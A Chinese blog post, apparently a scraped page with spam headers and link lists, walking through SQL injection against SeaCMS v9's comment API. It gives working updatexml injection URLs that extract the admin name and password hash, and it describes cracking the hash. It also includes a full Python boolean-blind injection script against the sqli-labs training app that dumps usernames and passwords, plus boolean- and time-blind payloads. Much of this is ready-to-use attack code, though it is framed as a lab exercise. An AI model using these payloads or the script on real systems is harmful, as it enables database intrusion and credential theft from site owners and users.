当前位置: 首页 > news >正文

建设工程有限公司网站百度网盘下载安装

建设工程有限公司网站,百度网盘下载安装,网页微信版可以加入腾讯会议吗,那家做网站最靠扑一、网上收集: 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采 用的是 php5.Xmysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数…

一、网上收集:

        海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采 用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist;

二、经过源码分析,使用以下语句注入(limit避免管理员有多个,导致SQL语句报错):

http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`

三、并没有成功,使用Wireshark抓包发现最终执行的SQL为:

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment 
WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select name from#
sea_admin limit 0,1)),1), @`\'`) ORDER BY id DESC

四、查询数据库:

五:再次在地址栏尝试注入语句,成功注入出账号为admin:

password:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`
 

密码同理

注入密码为23a7bbd73250516f069d,可以看出是经过md5加密的,于是到https://cmd5.com/ 解密,得到密码为admin123

布尔盲注:

import requests
from bs4 import BeautifulSoup

def get_username(resp):
    soup = BeautifulSoup(resp,'html.parser')
    username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    return username

def inject_database_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_table_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \
                information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_column_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \
                information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_data_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) \
                from users),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

if __name__ == '__main__':
    # inject_database_boolen()
    # inject_table_boolen()
    # inject_column_boolen()
    inject_data_boolen()

​​​​​​​注入结果:

  • 布尔盲注

    ORDER BY IF((SELECT SUBSTR(password,1,1) FROM sea_admin LIMIT 0,1)='a',1,2)

    如果页面按 1 排序,则说明密码的第一个字符为 a

  • 时间盲注

    ORDER BY IF((SELECT SUBSTR(password,1,1) FROM sea_admin LIMIT 0,1)='a', SLEEP(5), 1)

    如果页面响应时间延迟,则说明条件成立;

http://www.cadmedia.cn/news/1399.html

相关文章:

  • 广汉做网站百度快照优化seo
  • 天津培训网站建设淄博网站推广
  • 北京公司网站优化青岛seo搜索优化
  • 网站建设兼职合同模板今日小说排行榜百度搜索榜
  • 绍兴柯桥区城乡建设局网站如何做线上销售和推广
  • 企业网站建设计划企业品牌类网站有哪些
  • 网站建设费用资本化投广告的平台有哪些
  • 山东泰安建筑工程集团有限公司六年级上册数学优化设计答案
  • 网站建设湖南如何在百度发广告
  • 珠海建设网站的公司哪家好百度一下首页官网下载
  • 有免费建站的网站宁波网站推广找哪家公司
  • 咨询行业广州网站设计专注乐云seo
  • 网站建设公司首页接广告推广
  • lamp 网站建设论文商品seo优化是什么意思
  • 深圳整站全网推广数字营销软件
  • 郴州网站建设设计制作哈尔滨seo关键词
  • 汽车销售公司的网站怎么做站长工具中文精品
  • 如何优化网络连接搜索引擎优化内容包括哪些方面
  • 网站建设流程有广州网站优化方案
  • 北京市网站建设企业百度在西安有分公司吗
  • 做网站的代码难吗潍坊网站建设
  • 在线免费看影视网站seo优化师是什么
  • 贵州建设厅造价信息网站武汉seo首页优化技巧
  • 武威建设厅网站网页快照
  • 自学网站建设基本流程百度seo报价
  • 河南网站建设制作价格seo如何去做优化
  • 企业网站建设北京怎样注册自己网站的域名
  • 建设网站可以搜索电影免费b站推广短视频
  • 销售网站建设价格神马推广
  • 微信官方网站服务中心湖南网站推广公司